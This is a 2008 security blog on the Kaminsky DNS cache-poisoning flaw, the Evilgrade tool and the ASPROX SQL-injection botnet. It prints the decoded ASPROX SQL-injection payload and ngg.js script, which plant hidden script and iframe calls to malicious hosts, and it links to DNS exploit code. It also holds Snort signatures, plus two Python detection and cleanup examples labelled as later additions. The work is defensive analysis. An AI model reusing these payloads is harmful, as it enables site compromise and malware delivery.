Monday, July 28, 2008

You have a new update available...

On the tail of the huge DNS flaw, Argentinian group InfoByte Security Research has released a shocking new tool to exploit insecure application updates using man-in-the-middle attacks, including Kaminsky's DNS poisoning.

Essentially, "Evilgrade" is both an attack toolkit and a mock update server framework that redirects applications' update services to the host running Evilgrade. If the redirection succeeds, full system compromise is possible, giving the attacker a passive way to amass a botnet.

Evilgrade has support for exploiting the update services of the following popular programs:
Java, Winzip, Winamp, Mac OS X, OpenOffice, iTunes, Linkedin Toolbar

So what is the upside to such a scary tool? It will likely force developers to create a new secure process for pushing updates, probably moving to some sort of PKI architecture.

Thursday, July 24, 2008

Kaminsky DNS Cache Poisoning PoC Exploit in Metasploit SVN

Looks like Druid and HDM have released a proof of concept exploit in Metasploit to attack nameservers using Kaminsky's now leaked vulnerability. This is huge because not only is the attack unbelievably easy to execute, 95% of the Internet is still vulnerable!

This is a historical moment in IT Security and will be a very, very busy day for those of us on the defense side.

Exploit Code:

http://www.caughq.org/exploits/CAU-EX-2008-0002.txt

http://www.caughq.org/exploits/CAU-EX-2008-0003.txt

Or simply grab the latest Metasploit:

svn co http://metasploit.com/svn/framework3/trunk/

Snort signatures I wrote for Emerging Threats:

alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible NS RR Cache Poisoning Attempt"; content: "|85 00 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src,count 50, seconds 2; classtype:bad-unknown; reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008447; rev:10;)

alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible A RR Cache Poisoning Attempt"; content: "|81 80 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src, count 50, seconds 2; classtype:bad-unknown; reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008457; rev:10;)
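What the two signatures above key on, as an added Python example that is not part of the original post or of the Emerging Threats ruleset: it decodes the eight bytes matched at offset 2 (flags, QDCOUNT, ANCOUNT, NSCOUNT) and approximates the `type both` threshold per source. The class and function names, the source addresses and the traffic are constructed for illustration.

```python
import struct

# The 8 bytes each signature matches at offset 2 of the UDP payload:
# flags, QDCOUNT, ANCOUNT, NSCOUNT (the 2-byte transaction ID is skipped).
PATTERNS = {
    bytes.fromhex("8500000100010001"): 2008447,  # QR+AA+RD, counts 1/1/1
    bytes.fromhex("8180000100010001"): 2008457,  # QR+RD+RA, counts 1/1/1
}

def describe_header(payload):
    """Decode the 12-byte DNS header into the fields the signatures key on."""
    txid, flags, qd, an, ns, ar = struct.unpack("!6H", payload[:12])
    return {"txid": txid, "response": bool(flags & 0x8000),
            "authoritative": bool(flags & 0x0400), "rd": bool(flags & 0x0100),
            "ra": bool(flags & 0x0080), "rcode": flags & 0x000F,
            "counts": (qd, an, ns, ar)}

class BothThreshold:
    """Approximates 'threshold: type both, track by_src, count 50, seconds 2'."""
    def __init__(self, count=50, seconds=2.0):
        self.count, self.seconds = count, seconds
        self.state = {}  # (sid, src) -> [window_start, hits, alerted]

    def observe(self, ts, src, payload):
        """Return the sid once per window when a source reaches the count."""
        sid = PATTERNS.get(payload[2:10])
        if sid is None:
            return None
        st = self.state.get((sid, src))
        if st is None or ts - st[0] >= self.seconds:
            st = self.state[(sid, src)] = [ts, 0, False]
        st[1] += 1
        if st[1] >= self.count and not st[2]:
            st[2] = True
            return sid
        return None

def demo():
    """Constructed traffic: a 60-packet burst and a slow benign trickle."""
    det, alerts = BothThreshold(), []
    tail = b"\x00\x00" + b"constructed-body"  # ARCOUNT + placeholder body
    traffic = [(i * 0.01, "192.0.2.53", 0x8500, i) for i in range(60)]
    traffic += [(float(i), "198.51.100.7", 0x8180, 7000 + i) for i in range(10)]
    for ts, src, flags, txid in sorted(traffic):
        pkt = struct.pack("!5H", txid, flags, 1, 1, 1) + tail
        if det.observe(ts, src, pkt):
            alerts.append((src, describe_header(pkt)["txid"]))
    return alerts

if __name__ == "__main__":
    print(demo())
```

The burst trips the threshold once, on its fiftieth response, while a resolver answering one query per second never does; the transaction ID changes on every packet but sits outside the matched bytes.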


*** Update ***
A new Metasploit module is out this morning which allows cache poisoning that overwrites the NS record for an entire domain. This means that with an evil NS server ready to take requests, you can mass own entire domains such as Google, Microsoft, etc. Scary stuff.

http://blog.wired.com/27bstroke6/2008/07/dns-exploit-in.html

Tuesday, July 22, 2008

Major DNS Flaw revealed

The Security blogosphere is exploding with chatter today about leaked details of Dan Kaminsky's multi-vendor DNS flaw.

Here is how it works (according to the leak):

Mallory wants to poison the server ns.polya.com

Mallory sends NS requests for ulam00001.com, ulam00002.com … to ns.polya.com.

Mallory then sends forged answers, saying that the NS for www.ulam00002.com is ns.google.com *AND* puts in a glue record saying that ns.google.com is 66.6.6.6

Because the glue record corresponds with the answer record (same domain), the targeted nameserver will cache it, or replace its current record for ns.google.com with 66.6.6.6

http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html

Make sure to read the comments for details of the original leak (Matasano's blog). The drama is that Matasano originally called BS on the flaw, forcing Dan to back it up with a phone briefing. Thomas Ptacek then retracted his BS claims under the agreement that he would keep quiet. Now the same guy who leaked the technical details is attempting to apologize... What a jerk.

http://www.matasano.com/log/1105/regarding-the-post-on-chargen-earlier-today/

Updated ASPROX Toolkit

We have a new tool kit available with the following important additions:

T-SQL code for cleaning infected databases.

URLScan configuration instructions for catching injection attempts.

click here to grab the new tool kit

Thursday, July 10, 2008

ASPROX Botnet up to 16,500 Zombies

Just a quick update: ASPROX is currently at around 16,500 zombies, up from 12k last week.

Get the updated IP list of the infected zombie hosts

And make sure to grab our ASPROX information toolkit

Monday, July 7, 2008

ASPROX Payload Morphed NGG.JS

New domains have been found, and a new JavaScript payload, "ngg.js", has replaced the previous "b.js".

And it doesn't seem to be wasting any time:
http://www.google.com/search?q=ngg.js
Results 1 - 10 of about 19,300 for ngg.js. (0.03 seconds)

New SQL Injection Payload (HEX DECODED):

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''script src=http://www.apidad.com/ngg.js /script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
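An added Python example (not from this blog or the Sentinel toolkit) for checking exported column values for the tag this payload appends and stripping it. It assumes the tag is stored with its angle brackets, which the listing above has lost; the row layout, function names and trusted-host parameter are hypothetical, and the 4000-character check is a heuristic derived from the CONVERT(VARCHAR(4000), ...) in the payload.

```python
import re

# Tag appended by the payload, assumed stored as <script src=URL></script>.
INJECTED = re.compile(
    r"<script\s+src=[\"']?(https?://([^/\s\"'>]+)[^\s\"'>]*)[\"']?\s*>\s*</script>",
    re.IGNORECASE)

def clean_value(value, trusted_hosts=()):
    """Return (cleaned, removed_urls, likely_truncated) for one column value."""
    removed = []

    def drop(match):
        if match.group(2).lower() in trusted_hosts:
            return match.group(0)      # keep the site's own script includes
        removed.append(match.group(1))
        return ""

    cleaned = INJECTED.sub(drop, value)
    # The payload stores RTRIM(CONVERT(VARCHAR(4000), col)) + tag, so a value
    # that is exactly 4000 characters once the tag is gone was probably cut.
    likely_truncated = bool(removed) and len(cleaned) == 4000
    return cleaned, removed, likely_truncated

def scan_rows(rows, trusted_hosts=()):
    """rows: iterable of (table, column, key, value). Returns a list of findings."""
    findings = []
    for table, column, key, value in rows:
        cleaned, removed, cut = clean_value(value, trusted_hosts)
        if removed:
            findings.append({"where": (table, column, key), "urls": removed,
                             "cleaned": cleaned, "restore_from_backup": cut})
    return findings

# Constructed sample rows (table, column, primary key, value).
TAG = "<script src=http://www.apidad.com/ngg.js></script>"
SAMPLE_ROWS = [
    ("news", "title", 1, "Quarterly results" + TAG + TAG),  # injected twice
    ("news", "body", 1, "x" * 4000 + TAG),                   # cut at 4000 chars
    ("news", "title", 2, "Clean row"),
    ("pages", "html", 9, '<script src="http://cdn.example.com/app.js"></script>'),
]

if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS, {"cdn.example.com"}):
        print(finding["where"], finding["urls"], finding["restore_from_backup"])
```

Stripping the tag does not bring back text lost to the 4000-character conversion, which is why rows flagged `restore_from_backup` need the original value from a backup.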

What's in ngg.js? The familiar iframe attack from before, but this time it selectively ignores browsers from Russia, Ukraine, China, Korea, Vietnam and India. Lovely :)

window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("updngg=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+11*3600*1000);
document.cookie = "updngg=update;expires="+expires.toGMTString();
try{
document.write("iframe src=http://mainbvd.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0>/iframe");
}
catch(e)
{
};
}}



New ASPROX domains spotted:


Snort signature to detect access of infected site:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX Infected Site - ngg.js Request"; flow:established,to_server; uricontent:"/ngg.js"; classtype:trojan-activity; reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)

And finally go here to download Sentinel IPS' ASPROX Information Toolkit

Thursday, July 3, 2008

ASPROX Botnet Fingerprinted: 11,816 Zombies

Today at 2pm CST I launched a massive query on our widespread network of Sentinel IPS appliances, pulling unique source IPs from the ASPROX SQL Injection attacks.

Now we have an idea of size, location of zombies and a giant block list which we have made available right here

**Update** This is a list of infected machines emanating the SQL Injection attacks, not the number of compromised ASP websites, which is much higher nearing 100,000.

Was fun to whip up this geo-map of ASPROX's zombies...

Wednesday, July 2, 2008

New ASPROX / SQL Injection Defense Tools

ASPROX is not letting up; many of our clients are still seeing SQL Injection attacks blocked every 3-5 minutes on their Sentinel.

Microsoft released a tool for scanning your ASP and ASPX code and identifying SQL Injection vulnerabilities. I highly recommend giving it a try: kb-954476

HP also released a free version of their web security auditing tool specifically to check for SQL Injection. It's called Scrawlr and you can get it here


More ASPROX domains (they don't give up, do they?):



And finally, we are still emailing our ASPROX Toolkit document, which gives information on the attack and how to recover from it if your organization has been compromised.

Tuesday, July 1, 2008

Iframes and IE, vewwy vewwy bad...

Responses poured in after my last post from readers wanting to know how malware can be loaded simply by including an iframe (sourcing HTML from another site).

Well, in case you too are wondering, MS never intended it to be that way....

See http://www.kb.cert.org/vuls/id/516627


New ASPROX domains: dl251.com